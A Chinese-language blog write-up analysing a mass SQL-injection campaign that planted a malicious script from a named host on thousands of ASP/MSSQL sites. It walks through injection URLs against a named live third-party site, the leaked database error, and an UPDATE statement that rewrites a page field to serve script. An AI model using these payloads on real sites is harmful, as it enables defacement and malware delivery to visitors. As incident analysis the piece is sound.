一. 首先在網(wǎng)上找到了這次攻擊的新聞報(bào)道 http://www.nsfocus.net/news/6697 http://hi.baidu.com/secway/blog/item/e80d8efa4bf73ddab48f31a3.html 通過(guò)GOOGLE搜索到了相關(guān)被黑的頁(yè)面 http://www.google.cn/search?hl=zh-CN&q=site:trendmicro.com www.2117966.net f**kjp.js&btnG=Google 鎼滅儲(chǔ)&meta=&aq=f 趨勢(shì)科技的頁(yè)面被插入過(guò)http://www.2117966.net/f**kjp.js相關(guān)的JS掛馬。
二. 直接查找這個(gè)JS相關(guān)的信息 http://www.google.cn/search?complete=1&hl=zh-CN&newwindow=1&q=www.2117966.net f**kjp.js&meta=&aq=f 發(fā)現(xiàn)了12,500項(xiàng)符合的結(jié)果，這些返回的結(jié)果信息都是當(dāng)前頁(yè)面被插入了JS掛馬。 通過(guò)分析發(fā)現(xiàn)被黑的頁(yè)面都有如下特征： 1.被修改頁(yè)面的網(wǎng)站都是ASP MSSQL的架構(gòu)。 2.被修改的頁(yè)面都存在SQL注入漏洞。
三. 取了其中一個(gè)被掛馬頁(yè)面做了SQL注入掛馬的模擬攻擊： 1. http://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp?person=5162 這個(gè)鏈接存在明顯的SQL注入,對(duì)person參數(shù)注入語(yǔ)句having 1=1,將暴出當(dāng)前頁(yè)面注入點(diǎn)的表名為coordinator，字段名ShCoordinatorSurame。 http://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp?person=5162 having 1=1 —————————
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14′
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘coordinator.ShCoordinatorSurame’ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp, line 20
—————————- 2. 修改暴出的當(dāng)前頁(yè)面的表名，字段名內(nèi)容為插入JS的代碼來(lái)實(shí)現(xiàn)掛馬 http://www.wisard.org/wisard/shared/asp/Generalpersoninfo/StrPersonOverview.asp?person=5162;update coordinator set ShCoordinatorSurame=’’ where 1=1–– 修改coordinator 表 ShCoordinatorSurame 字段內(nèi)容為,同時(shí)設(shè)一個(gè)1=1為真的邏輯條件就可以修改當(dāng)前頁(yè)面查詢數(shù)據(jù)的內(nèi)容. 就可以實(shí)現(xiàn)在有SQL注入點(diǎn)的頁(yè)面直接掛馬。
四.總結(jié). 這次大規(guī)模攻擊的流程應(yīng)該是自動(dòng)化的： 1.通過(guò)先進(jìn)的掃描技術(shù)批量收集到幾萬(wàn)網(wǎng)站的SQL注入漏洞。 2.針對(duì)漏洞攻擊，進(jìn)行自動(dòng)化的SQL注入掛馬。 現(xiàn)今雖然SQL注入漏洞已經(jīng)很老了，但是這次黑客在一天內(nèi)同時(shí)對(duì)數(shù)萬(wàn)網(wǎng)站攻擊掛馬的技術(shù)卻是很驚人的，連趨勢(shì)這樣的安全公司也未能幸免。

版權(quán)聲明：本站文章來(lái)源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有，歡迎引用、轉(zhuǎn)載，請(qǐng)保持原文完整并注明來(lái)源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站，禁止在非maisonbaluchon.cn所屬的服務(wù)器上建立鏡像，否則將依法追究法律責(zé)任。本站部分內(nèi)容來(lái)源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來(lái)，僅供學(xué)習(xí)參考，不代表本站立場(chǎng)，如有內(nèi)容涉嫌侵權(quán)，請(qǐng)聯(lián)系alex-e#qq.com處理。